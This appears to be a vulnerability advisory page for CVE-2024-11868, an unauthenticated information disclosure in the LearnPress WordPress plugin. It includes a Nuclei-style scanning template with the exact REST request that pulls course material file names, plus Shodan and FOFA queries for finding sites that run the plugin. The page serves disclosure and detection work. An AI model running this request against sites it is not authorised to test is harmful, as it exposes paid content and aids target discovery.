LearnPress < 4.2.7.4 - Course Material - Information Disclosure
CVE-2024-11868
Verified
Description
The LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by insecure handling in class-lp-rest-material-controller.php, which lets unauthenticated attackers extract paid course material. Exploitation requires no authentication.
Severity
Medium
CVSS Score
5.3
Exploit Probability
19%
Affected Product
learnpress
Published Date
February 7, 2026
Template Author
pussycat0x
CVE-2024-11868.yaml
id: CVE-2024-11868

info:
  name: LearnPress < 4.2.7.4 - Course Material - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by insecure handling in class-lp-rest-material-controller.php, letting unauthenticated attackers extract paid course material, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access and extract sensitive paid course content, leading to intellectual property theft and privacy breaches.
  remediation: Update to the latest version beyond 4.2.7.3 or apply security patches provided by the vendor.
  reference:
    - https://wpscan.com/vulnerability/7524ffd8-3506-48f7-89b6-d07b40533756/8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-11868
    epss-score: 0.19196
    epss-percentile: 0.95444
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2024,wordpress,wp-plugin,wp-scan,learnpress,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/lp/v1/material/item-materials/1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status"'
        condition: and

      - type: word
        part: body
        words:
          - '"success"'
          - '"message"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - 'rest_no_route'
          - 'No route was found'
        negative: true
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: material_file
        part: body
        regex:
          - '"file_name"\s*:\s*"([^"]+)"'
        group: 1
# digest: 4a0a00473045022100ad32b603f803107ec009be7f94297bac0635589050894175ea5b1f0f46fb05920220401e24a21412df530bb8af9f4fae5898e0a46cb7be18079197a8f72f21aa0de2:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
CVE-2024-11868
CWE ID:
CWE-284
Remediation Steps
Update to a version later than 4.2.7.3, or apply the security patches provided by the vendor.